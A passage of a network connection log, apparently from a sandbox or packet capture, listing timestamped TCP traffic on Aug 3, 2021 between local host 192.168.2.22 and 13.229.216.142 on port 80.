Aug 3, 2021 16:50:37.810151100 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.810161114 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.810172081 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.810183048 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.810197115 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.810199976 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.810220003 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.810239077 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.810240984 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.810254097 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.810262918 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.810266972 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.810283899 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.810301065 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.810306072 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.810314894 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.810327053 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.810348988 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.810352087 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.810370922 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.810373068 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.810391903 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.810395956 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.810409069 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.810416937 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.810431957 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.810453892 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.810585976 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.811269045 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.811295986 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.811319113 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.811331987 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.811342001 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.811343908 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.811364889 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.811386108 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.811391115 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.811394930 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.811408043 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.811422110 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.811886072 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.811912060 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.811933041 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.811934948 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.811948061 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.811956882 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.811964989 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.811979055 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.811994076 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.812002897 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.812011003 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.812037945 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.814197063 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.814260006 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.814337015 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.814374924 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.814516068 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.814553976 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.814699888 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.814737082 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.814778090 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.814802885 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.814814091 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.814825058 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.814836025 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.814848900 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.814851999 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.814882040 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.814932108 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.814954996 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.814976931 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.814985037 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.814995050 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815011024 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815020084 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815036058 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815043926 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815058947 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815071106 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815080881 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815103054 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815105915 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815145016 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815148115 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815151930 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815172911 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815190077 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815196991 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815207005 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815221071 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815236092 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815244913 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815257072 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815270901 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815280914 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815291882 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815304041 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815314054 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815321922 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815335989 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815347910 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815362930 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815371037 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815396070 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815459967 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815485954 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815495968 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815511942 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815521002 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815535069 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815546989 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815560102 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815568924 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815582037 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815593004 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815606117 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815607071 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815637112 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815640926 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815659046 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815668106 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815686941 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815690994 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815715075 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815721989 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815742970 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815749884 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815773010 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815787077 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815804958 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815809965 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815835953 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815841913 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815860987 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815872908 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815888882 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815901041 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815917015 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815926075 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815947056 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815949917 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.815973043 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.815979004 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816005945 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816013098 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816031933 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816042900 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816057920 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816067934 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816082954 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816104889 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816118002 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816133022 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816138029 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816159010 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816165924 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816185951 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816198111 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816211939 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816221952 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816236019 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816246986 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816262960 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816268921 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816287041 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816298008 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816309929 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816319942 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816335917 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816344023 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816360950 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816371918 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816387892 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816400051 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816416979 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816428900 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816443920 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816452026 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816472054 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816479921 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816500902 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816512108 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816521883 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816529989 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816554070 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816560984 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816576958 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816591024 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816601992 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816610098 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816628933 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816638947 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816649914 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816663980 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816673040 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816683054 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816698074 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816714048 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816720963 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816725016 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816746950 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816756010 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816770077 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816780090 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816792011 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816802979 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816817999 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816826105 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816839933 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816849947 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816863060 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816874981 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816885948 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816895962 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816910982 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816920996 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816940069 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816943884 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816966057 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.816975117 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.816992044 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817001104 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817014933 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817023993 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817038059 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817049026 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817064047 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817075968 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817085028 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817107916 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817112923 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817117929 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817133904 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817142010 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817158937 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817172050 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817183018 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817193031 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817205906 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817215919 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817229033 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817241907 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817250967 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817256927 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817274094 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817287922 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817296028 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817308903 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817326069 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817332983 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817348957 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817361116 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817369938 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817374945 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817397118 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817405939 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817420006 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817430973 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817442894 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817452908 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817475080 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817483902 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817497015 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817508936 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817517996 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817528009 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817543983 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817553043 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817565918 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817576885 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817595005 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817600012 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817621946 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817631960 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817645073 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817656994 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817667961 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817678928 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817692995 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817702055 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817718029 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817727089 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817744017 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817749023 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817766905 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817775965 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817797899 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817804098 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817823887 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817832947 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817847013 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817857981 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817869902 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817873955 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817892075 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817902088 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817914009 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.817924976 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.817948103 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.819154024 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973131895 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973174095 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973196983 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973221064 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973237991 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973258972 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973284960 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973306894 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973323107 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973325014 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973340988 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973342896 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973360062 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973370075 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973386049 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973387957 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973407030 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973423958 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973443985 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973450899 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973459959 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973464966 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973484039 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973484039 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973501921 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973505974 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973522902 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973525047 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973536015 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973550081 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973553896 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.973572016 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.973582983 CEST	49167	80	192.168.2.22	13.229.216.142
